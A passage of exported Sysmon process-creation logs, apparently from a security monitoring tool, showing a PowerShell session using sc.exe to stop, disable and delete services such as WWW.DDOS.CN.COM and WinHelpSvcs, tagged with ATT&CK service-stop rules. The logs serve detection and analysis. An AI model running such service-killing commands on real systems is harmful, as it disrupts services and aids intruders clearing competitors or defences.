12:50:58.917"",""processGuid"":""{df9fc3d3-b3b2-5ecf-0000-00103a9d2600}"",""processId"":""6284"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete aspnet_staters"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:27.264",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:58.899 +ProcessGuid: {df9fc3d3-b3b2-5ecf-0000-0010569c2600} +ProcessId: 5604 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop aspnet_staters +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop aspnet_staters",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:58.902623300Z"",""eventRecordID"":""2997"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:58.899\r\nProcessGuid: {df9fc3d3-b3b2-5ecf-0000-0010569c2600}\r\nProcessId: 5604\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop aspnet_staters\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:58.899"",""processGuid"":""{df9fc3d3-b3b2-5ecf-0000-0010569c2600}"",""processId"":""5604"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop aspnet_staters"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:27.220",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:58.848 +ProcessGuid: {df9fc3d3-b3b2-5ecf-0000-001089992600} +ProcessId: 7520 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHelpSvcs +CurrentDirectory: 
C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHelpSvcs",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:58.850273800Z"",""eventRecordID"":""2994"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:58.848\r\nProcessGuid: {df9fc3d3-b3b2-5ecf-0000-001089992600}\r\nProcessId: 7520\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHelpSvcs\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:58.848"",""processGuid"":""{df9fc3d3-b3b2-5ecf-0000-001089992600}"",""processId"":""7520"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHelpSvcs"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:26.652",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:58.779 +ProcessGuid: {df9fc3d3-b3b2-5ecf-0000-0010ea962600} +ProcessId: 7608 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WWW.DDOS.CN.COM +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WWW.DDOS.CN.COM",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:58.782624300Z"",""eventRecordID"":""2991"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:58.779\r\nProcessGuid: {df9fc3d3-b3b2-5ecf-0000-0010ea962600}\r\nProcessId: 7608\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WWW.DDOS.CN.COM\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: 
DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:58.779"",""processGuid"":""{df9fc3d3-b3b2-5ecf-0000-0010ea962600}"",""processId"":""7608"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WWW.DDOS.CN.COM"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:26.626",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: 
+RuleName: +UtcTime: 2020-05-28 12:50:58.761 +ProcessGuid: {df9fc3d3-b3b2-5ecf-0000-0010c0952600} +ProcessId: 7796 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config WWW.DDOS.CN.COM Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config WWW.DDOS.CN.COM Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:58.766135700Z"",""eventRecordID"":""2990"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:58.761\r\nProcessGuid: {df9fc3d3-b3b2-5ecf-0000-0010c0952600}\r\nProcessId: 7796\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® 
Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config WWW.DDOS.CN.COM Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:58.761"",""processGuid"":""{df9fc3d3-b3b2-5ecf-0000-0010c0952600}"",""processId"":""7796"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config WWW.DDOS.CN.COM Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:26.589",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:58.717 +ProcessGuid: {df9fc3d3-b3b2-5ecf-0000-001020932600} +ProcessId: 2780 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ExpressVNService +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 
ExpressVNService",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:58.721466800Z"",""eventRecordID"":""2988"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:58.717\r\nProcessGuid: {df9fc3d3-b3b2-5ecf-0000-001020932600}\r\nProcessId: 2780\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop ExpressVNService\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:58.717"",""processGuid"":""{df9fc3d3-b3b2-5ecf-0000-001020932600}"",""processId"":""2780"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop ExpressVNService"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:26.542",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:58.651 +ProcessGuid: {df9fc3d3-b3b2-5ecf-0000-0010588e2600} +ProcessId: 5352 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WebServers +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WebServers",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:58.659060800Z"",""eventRecordID"":""2985"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:58.651\r\nProcessGuid: {df9fc3d3-b3b2-5ecf-0000-0010588e2600}\r\nProcessId: 5352\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WebServers\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:58.651"",""processGuid"":""{df9fc3d3-b3b2-5ecf-0000-0010588e2600}"",""processId"":""5352"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WebServers"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 